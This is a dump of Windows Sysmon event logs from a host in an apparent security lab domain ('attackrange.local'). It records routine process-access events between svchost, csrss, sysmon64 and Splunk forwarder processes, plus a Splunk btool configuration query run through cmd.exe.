13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4324-6000-B200-000000009A01}2428C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4324-6000-B100-000000009A01}6444172C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4324-6000-B200-000000009A01}2428C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.647{08A6967A-4324-6000-B200-000000009A01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4324-6000-B100-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4324-6000-B100-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4324-6000-B100-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4324-6000-B000-000000009A01}18444376C:\Windows\system32\cmd.exe{08A6967A-4324-6000-B100-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.640{08A6967A-4324-6000-B100-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4324-6000-B000-000000009A01}1844C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-log 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4324-6000-B000-000000009A01}1844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:04.635{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 